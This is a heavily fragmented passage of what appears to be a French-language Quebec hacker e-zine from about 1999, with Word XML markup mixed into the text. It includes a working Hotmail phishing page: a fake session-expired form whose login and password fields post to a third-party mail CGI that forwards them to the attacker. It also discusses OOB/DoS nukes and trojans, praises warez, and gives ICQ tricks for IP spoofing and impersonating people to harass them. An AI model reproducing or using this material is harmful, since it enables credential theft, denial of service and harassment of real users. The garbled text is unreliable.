pas une secon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1 - Hacker un compte Hotmail .. :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ent faire: pour piéger un de vos camarades qui est pas trop méfiant, envoyez lui cec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l y répond vous recevrez ses pass  avec son login pour Hotm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plus la plupart des utilisateurs ont le même pass pour leur site et leur m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la partie rouge correspond à votre e-mail, créez un compte mail pas trop voyant (style: hotmail_staff@caramail.com), et allez récupérez les pass là-bas. Vous devez mettre ce qui est en bleu et rouge dans votre mail. En fait ce serait plus un piège à cons qu'autre chose! Mais ça marche bien c'est s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re Sorry, We Can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 Your Req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ason:  Time expired for your account. Please re-log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gin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 to Hotmail's Homep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96-1999. Hotmail© all rights re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illeurs en voici le code sou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html&gt;&lt;head&gt;&lt;/head&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body bgcolor="#ffffff" link="#000099" vlink="#000099"&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able border=0 cellpadding=5 cellspacing=5 width=508 height=90%&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r valign=middle&gt;&lt;th colspan=2&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nt face="Arial, Helvetica" size="5"&gt;We're Sorry, We Cannot&lt;b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 Your Request&lt;/fon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h&gt;&lt;/t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r valign=middle&gt;&lt;td align=cente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nt face="Arial, Helvetica" size="3"&gt;Reason:&amp;nbsp;&lt;/fon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nt face="Arial, Helvetica" size="3" color="#ff0000"&gt;&lt;b&gt;Time  expired for your account. P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login.&lt;/b&gt;&lt;/font&gt;&lt;b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d&gt;&lt;/t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tr valign="middle"&gt;&lt;td align="cente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RM METHOD="POST" NAME="hotm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TION="http://www.univox.com/cgi-bin/mail/Mail.cg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rget="_paren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INPUT TYPE="hidden" NAME="recip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LUE="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user_guest@hotmail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>"&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INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password"&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INPUT TYPE="hidden" NAME="return_link_ur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UE="http://www.hotmail.com/cgi-bin/star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able cellpadding="0" cellspacing="5" border="0"&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r&gt;&lt;td&gt;&lt;font face="Arial, Helvetica" size="2"&gt;Log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me:&lt;/font&gt;&lt;br&gt;&lt;inp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ype="text" name="login" size="16" maxlength="16"&gt;&lt;/td&gt;&lt;td&gt;&lt;f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ce="A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lvetica" size="2"&gt;Password:&lt;/font&gt;&lt;br&gt;&lt;input type="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me="passw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ze="16" maxlength="16"&gt;&amp;nbsp;&lt;input type="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ue="Enter"&gt;&lt;/td&gt;&lt;t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able&gt;&lt;/FORM&gt;&lt;/td&gt;&lt;/t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tr valign=middle&gt;&lt;th colspan=2 align=center&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nt face="Arial, Helvetica" size="3"&gt;Return to &l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ref="http://www.hotmail.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rget="_parent"&gt;Hotmail's Homepage&lt;/a&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t;/font&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/table&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font size=2 color=black&gt;1996-1999. Hotmail© all rights reserved.&lt;/fon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s con mais tres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Freeman&gt; C`est seulement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2 - Nuke/Lamer/Protocol (ou comment mettre un titre l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alut les pots le L'UNDERGROUND Québecois ! On ne parlera pas comment utili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 Back Orifice et SURTOUT PAS DE NET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ous Devez connaitre les D.O.S. Attack , OOB attack ?? Et b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 vous le savez pas encore et bien sachez que cest comme un nuke : plusieur dentre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e disent deja  ( Calice qui sont lame ) mais ecouter ceci :  A ceux qui pense e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uperieur et deja tout savoir , VOUS avez deja du passer par la , apprendre comm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rche un nuke !! Ben ya du monde qui font juste downloader le prog et op vive le nu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y sont fier et ils utilisent NETBUS!!! mais je pourrais meme dire quen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etre fier yapelle sa du HACKING!!! SA CEST LAMER en calice!!! mais la personne qui s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Back Orifice cest en UDP ben sont deja pas pire!  pour ceux qui veulent saméliorer b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DP = User Datagram Protoc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CMP = Internet Control Message Protoc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CP = Transfert Control Protoc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TTP = Hyper Text Transfer Protocol ( wow sest la meme affaire dans les adresse WEB!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Revenons a Nos NUKE OOB et DOS , OOB nuke vous avez du deja remarquer que cest pour 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dows plante ( PORT 139 )( meme si Windows plante toujours tout seul ) faque cest ut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mais faite pas expres de nuker un gars en LINUX essais meme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espere que sa vous a aider cher lec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voici la Question du cour paragraphe den h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hy Drink And Drive When You Can Puff And F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I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Membre de QuebeC-Hack et QHA )( Hell Bringers Commando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M Trade Mark QHA ( DO NO COPIE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Bilb0&gt; La vie contin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3 - Chronique Culturelle (C'est quoi la culture pap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Jeux Vidé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IABLO2: Bon , Le fameux Diablo2 , Qui n'en na pas parler , et oui , il parait quil y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ne version beta sur le net mais bon , Jattend la Finale car ca risque de rentr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lm connais Lhistoire , vous incarner un guerrier ( ou guerriere) et vous d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ccomplir plein de fabuleuse quêtes !! BOn je dois avouer que Diablo ( le 1 )  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éelement envouter , alors jespere que le 2 qui est estimer a etre 4 fois plus gran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lus complexe et plus tout quoi :)) Alors Ce jeux devrai sortir Fin novembre ou deb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écembre alors la Version  Warez va etre surement Dispo dans le courant du mois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vembre voire meme , fin octobre !!! aller on croise les doig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GTA2: HéHé , Grand theft auto , le jeux que les Flic haisse le plus ( car on est but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a poigné) héhéhé jaime ca , Le 2 est donc prevu pour bientot !!!!! a ne pas confond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vec ce que bcp de monde crois GTA2 ( GTa london 1961) qui étais une putin de merde s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s sens  mais bon .. le GTa2 on alttend Car Il y a bcp plus de ville , elles sont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grosse, plus beaux graphique , plus de perso a incarner , et bcp plus long et un un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ous nouveau quoi !! alors ce jeux la DEMO officielle est sur www.jeuxvideo.com et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ttend la version warez Finale dans le debut octob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ake3: Le 3DSHOOTER par exellence je le nomme Q3 !!! Ouais La version Sur le net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ortit et Franchement ca vaut le 33 meg a Dl !!!! Des graphique a COUPER le soufle ,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l est tjrs aussi FUN !!! mais jai aps grand new sur qd la verison Finale sortira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rez alors v'ner sur #QHA pour vous tenir au cou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RMAGEDDON2000: Ouaaaaaaaaaais Enfin !!! Ils nous reviens , Encore plus sangla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gore et tout !!!! plus de voiture , plus de ville et plsu de piéton a ecraser !!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ouais du FUn pure a 100% Mais a pas recommender au gens qui on tendence a faire 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ils viot dans les jeux video car .. ils va y avoir un carnage !!! Ouais encore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anvier 2000 pour ce jeux alors on croise les doigts et on se defoule sur le 2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ttenda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EAM FORTERESSE2: Ouais la suite du celebre jeux de SIERRA on va le nommé ,  Half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avec lextension Internet team forteresse . Bon je dois avouer que Team forteresse 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ptiver pendant 4 mois .. tout les jours au moins 1-2 hrs =) Alors j'attend av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mpatience le 2 .. mais la c'est tous différent .. Ont est dans l'armée et on do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opper Gordon . .alors un New defit !!! Pas de Date jusqua présent  .. alors on espè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 plus proche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DukeNukem 0 Hours et max Payne : Bon Duke et son pitit frere dans 2 shooter differ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Ils risque d'etre tres bon les 2 ... entk Duke nukem o hours au play est fort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I ! mais max payne  .. cets le premier Du nom ... Aors on espere quil vont etre g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sanglant !!! encore la dans le courant 2000 pour c'est je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 Moi je vous est fait le Résumé des jeux les plus attendu en cette fin de millen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t debut du prochain !!!! Il y a p-t des Info erroné  car cela change tellement v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on n'a jamais le temps d'etre a jour dans ce monde .. Tout cela sgnifie .. courer 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gazin acheter ( ouais car il y en a pas sur le warez) un HD de 20 gig Scii ou fa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un Format c:\ car avec toute c'est new dans le domaines des jeux video ca risqu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L un MAX !!!! alors v'nez tous sur #QHA ou moi ( SPINER) et les autres on se fera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rand Plaisir a vous filez des adresse ou les Dl en tmeps v'n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PI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mbre de QuebeC-Hack et QHA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M Trade Mark QHA ( DO NO COP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WarLorrs&gt; sans le Warez j`pourrais pas survive dans la v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14 - QUELQUES TRUCS IC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en de vos pas un bon tite articles de IC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fenir ce cher E-Z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comment spoofer son ip d'icq sans programme?(Thor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ur cela vous avez juste besoin de 3 cho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a essayez d'avoir tous le materiel necesaire ou si non cela n'ira pas ;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nez l'ip de quelqu'u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er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fere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rv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changer le serveur qui est no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mirabilis.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laisser icq1.mirabilis.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res cela deconencter vous d'icq et reconnectez vous ap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er dans securiti privacy et enl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not ip publ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tour est jou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TENTION: cette astuce fonctionne rarement mais ça vaux le coup d'essay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N'oubliez pas de prendre note des anciens serveurs au cas ou icq ne voudrait pas se reconnec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plus celà ne marche que si la personne utilise: ICQ IP SNIFFER (Note de Cl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Comment reperer quelqu'un qui joue avec multiicq?(Thor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va venter son autre nick par ex si je m'appelle nozep je vais d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tu connais thor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oui je l'ai dans ma li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c'est le meilleur hacker que je connaisse il sais tous f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a ouai! c cool ç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c'est lui qui m'as tout ap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vra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si je te le d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comment tu le trouve t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je lui ai jamais vraiment parler mais il n'as pas l'air tres soci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tu crois qu'il voudra m'apprend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non, tu est trop nul pour lui cela mettera trop de te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à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suite si c'est un de vos amis il va vous questionner e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salut je suis le pire ennemi de thorgal c vraiment le plus con des c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ha b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qu'est ce que tu en trouve t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ben ça va quoi il est pas chiant avec m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il ne t'as jamais fait de sale co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oui il m'as hacker mon site cet encu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tu veux le hacker avec m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il en saura rien que c'est moi he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t'en fait pas je metterai tous sur mon d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e : ok pas de prob alors , on commence mainten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zep : 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 seule façon de verifier si ce gars vous le connaissez c'est de regarder l'ip qui sera forcement le même a part si il a ete spoofer(si c'est le cas essayer de decouvrir qui c'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 c'est le même ip jouer le j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verrez comme les gens sont faux cul quelques fo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i un peu exagerer sur ce texte mais comme ça vous saurai a quoi vous en ten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3 Comment trouver un ip qui n'est pas montrer sur icq sans programme?(Thorg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ur faire cela c'est bien facile! ce truc ne marche cependant que avec icq 9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regarder dans les infos de quelqu'un et il ne montre pas son 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penser directement a votre sniffer mais il vous viens a l'esprit que vous l'vez virusser il y as pas longte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bien vous rester sur le gars en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mettez la fleur rouge sur icq (donc vous vous deconnecter d'icq) et vous n'avez plus qu'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arder dans les infos du g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 cool n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ci fonctionne a out les coup et donne toujours le bon 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pendant il faut avoir la version d'icq 9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Comment envoyer des messages vides sur icq(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 technique est bête et facile à réaliser! cependant il fallait y penser! Alors vous avez devant vous la fenêtre ou vous devez écrire le message, mettez: alt+0160 . Une sorte d'espace va se créer, et icq vous permettra d'envoyer du... vide, il faut l'd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Comment se faire passer pour quelqu'un d'autre(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st assez simple à faire mais, sachez que c'est utile quand quelqu'un vous fait chier, vous vous faites passer pour lui auprès de sa cyber-meuf, et vous l'insultez sauvagement! Effet garanti... Mais bon si on passait à la pratique? Vous ouvrez Icq et vous allez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Change Current U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ister A New User (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notez TOUTES les informations de la victime, et vous les metez à son insu; résultat: seule l'UIN le différencie de vous (et l'IP aussi bien sur). Et en finish pour alterner les utilisateurs (donc vous et "lui"), vous fa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Q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Change Current U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ge the Active U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de là choisissez celui sur lequel vous désirez a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est déja tout pour se premier numéro de QHA. J'espere que vous avez appris quel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ose sinon, nous irons plus en detail dans le prochain numéro. Pour vos commentai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rticles, idées ou tout simplement pour nous rencontrer, il suffit de venir s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ndernet sur le channel #qha ou aller voir notre page Web pour plus d'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ur nos projets a venir (www.-q-h-a.com). Alors on vous laisse déja et n'oublier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 vous n'avez rien appris que le e-zine est plutot pour les débutants dans le dom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 sert plutot de réponse a la question: Comment on fais pour hacker????? Nous donn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ci quelque base pour assister les nouveaux et ceux qui veulent apprendre dans l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pprentissage.Une derniere petite note a propos du e-zine de 912, je crois que vous n'avez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raiment compris le but et la vision de QHA sur le monde du hacking, et je ne crois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s que nous traiter de lame parce qu'on s'occupe de ceux qui veulent apprendre s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ne bonne solution pour vous faire une promotion. Si vous voulez bien paraitre, prouv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 par vos actions et non par votre propos, car vous ne faites que vous caller vous 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 fesant ca. Mon message n'est pas insultant d'aucune manière envers vous al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j'aimerais que ca reste ainsi au lieu d'ecrire un texte de revange de 15 p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tenant au moins un sacre par 4 mots comme vous avez écris dans votre e-z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tk, bonne chance avec votre groupe et prouver ce que vous vallez au lieu de par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ans le v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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>£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CkEr FrOm ThE PuNk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vous ne connaissez pas 912 nous nou excusons du dernier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 a suivi par a part a eux.En passant,pour 912 il ne vos mieux pas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naitre cela detruirais tous votre carriere au grand complet en hac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 de tenir not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s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ot@fbi.go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